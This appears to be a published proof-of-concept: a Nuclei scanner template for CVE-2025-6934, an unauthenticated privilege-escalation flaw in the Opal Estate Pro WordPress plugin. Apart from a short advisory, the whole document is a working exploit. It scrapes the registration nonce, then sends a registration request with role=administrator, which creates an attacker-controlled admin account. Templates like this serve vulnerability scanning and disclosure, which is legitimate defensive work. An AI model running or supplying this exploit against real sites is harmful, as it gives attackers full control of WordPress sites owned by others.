The Opal Estate Pro plugin (≤ 1.7.5) is vulnerable to privilege escalation. Due to missing role restrictions in the on_register_user function, users can register with any role. This allows unauthenticated attackers to create administrator accounts.
PoC代码[已公开]
id: CVE-2025-6934
info:
name: The Opal Estate Pro – Property Management <= 1.7.5 - Unauthenticated Privilege Escalation
author: pussycat0x
severity: critical
description: |
The Opal Estate Pro plugin (≤ 1.7.5) is vulnerable to privilege escalation. Due to missing role restrictions in the on_register_user function, users can register with any role. This allows unauthenticated attackers to create administrator accounts.
impact: |
An attacker can exploit this vulnerability to register with administrator privileges, gaining complete control over the WordPress site.
remediation: |
Update the Opal Estate Pro plugin to a version newer than 1.7.5 when available, or remove the plugin if not essential.
reference:
- https://github.com/Nxploited/CVE-2025-6934/blob/main/README.md
- https://wordpress.org/plugins/opal-estate-pro/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-6934
epss-score: 0.16444
epss-percentile: 0.94638
cwe-id: CWE-269
metadata:
verified: true
max-request: 2
vendor: themeforest
product: opal-estate-pro
publicwww-query: "/wp-content/plugins/opal-estate-pro/"
tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,opalestate,vuln
flow: http(1) && http(2)
variables:
username: "{{randstr}}"
password: "{{to_lower(rand_text_alpha(8))}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "opalestate-register-nonce"
internal: true
extractors:
- type: regex
group: 1
name: nonce
part: body
internal: true
regex:
- 'name="opalestate-register-nonce" value="([a-f0-9]+)"'
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&email={{email}}&password={{password}}&password1={{password}}&role=administrator&confirmed_register=on&opalestate-register-nonce={{nonce}}&_wp_http_referer=%2F&ajax=1&action=opalestate_register_form
matchers:
- type: dsl
dsl:
- contains(body, 'status\":true')
- status_code == 200
condition: and
# digest: 4a0a00473045022100aeef65d517adba867a626b862282a74c2df51835f59ef690212183a4b0c747e4022015041195a0bc48bc3fbac435074cda3e8b076d75b59fe71c2b2b19d31a394fb0:922c64590222798bb761d5b6d8e72950